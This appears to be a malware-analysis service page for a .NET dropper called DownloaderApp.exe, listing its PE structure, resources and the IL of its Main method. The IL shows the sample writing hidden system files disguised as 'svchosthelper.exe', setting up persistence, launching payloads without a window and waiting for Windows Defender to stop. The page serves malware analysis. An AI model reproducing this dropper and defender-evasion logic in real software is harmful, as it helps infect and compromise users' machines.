Suspicious
Suspect

Share on LinkedIn
Print
PE Executable
MD5:
Size: 0 B
application/x-dosexec

Get an AI-generated breakdown of this malware's behaviour, IOCs and recommendations.

AI analysis is available with Essential.
Unlock with Essential
Symbol Obfuscation Score Medium
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
VgI6sEaGlOH8.T7a5F.HflQ7
VgI6sEaGlOH8.AvnEYS.qwebX
Name Value
Info
PE Detect: PeReader OK (file layout)
Info
PDB Path: C:\10\boot\Downloader_win\DownloaderApp\DownloaderApp\obj\Release\DownloaderApp.pdb
Module Name
DownloaderApp.exe
Full Name
DownloaderApp.exe
EntryPoint
System.Void A.B::Main(System.String[])
Scope Name
DownloaderApp.exe
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
DownloaderApp
Assembly Version
1.0.0.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.7.2
Total Strings
25
Main Method
System.Void A.B::Main(System.String[])
Main IL Instruction Count
84
Main IL
call System.Boolean A.B::C()
brtrue.s IL_0015: call System.Boolean System.Environment::get_UserInteractive()
call System.Void A.B::D()
leave.s IL_0014: ret
pop <null>
leave IL_00F3: ret
ret <null>
call System.Boolean System.Environment::get_UserInteractive()
brtrue.s IL_0027: ldstr "svchosthelper.exe"
newobj System.Void A.E::.ctor()
call System.Void System.ServiceProcess.ServiceBase::Run(System.ServiceProcess.ServiceBase)
ret <null>
ldstr svchosthelper.exe
stloc.0 <null>
ldstr systemhelper.exe
stloc.1 <null>
ldstr WindowsLogsHelper
stloc.2 <null>
ldc.i4.s 36
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
dup <null>
ldloc.0 <null>
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.3 <null>
ldloc.1 <null>
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.s V_4
ldstr VgI6sEaGlOH8.T7a5F.HflQ7
ldloc.3 <null>
call System.Void A.B::F(System.String,System.String)
ldstr VgI6sEaGlOH8.AvnEYS.qwebX
ldloc.s V_4
call System.Void A.B::F(System.String,System.String)
ldloc.3 <null>
ldc.i4.6 <null>
call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes)
ldloc.s V_4
ldc.i4.6 <null>
call System.Void System.IO.File::SetAttributes(System.String,System.IO.FileAttributes)
call System.Void A.B::H()
ldloc.3 <null>
ldloc.2 <null>
call System.Void A.B::I(System.String,System.String)
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
dup <null>
ldloc.s V_4
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
dup <null>
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
pop <null>
ldc.r8 3
call System.TimeSpan System.TimeSpan::FromMinutes(System.Double)
call System.Boolean A.B::WaitForDefenderStopped(System.TimeSpan)
brfalse.s IL_00EE: leave.s IL_00F3
ldloc.3 <null>
call System.Boolean System.IO.File::Exists(System.String)
brfalse.s IL_00EE: leave.s IL_00F3
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
dup <null>
ldloc.3 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
dup <null>
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
pop <null>
leave.s IL_00F3: ret
pop <null>
leave.s IL_00F3: ret
ret <null>
An error has occurred. This application may no longer respond until reloaded. Reload 🗙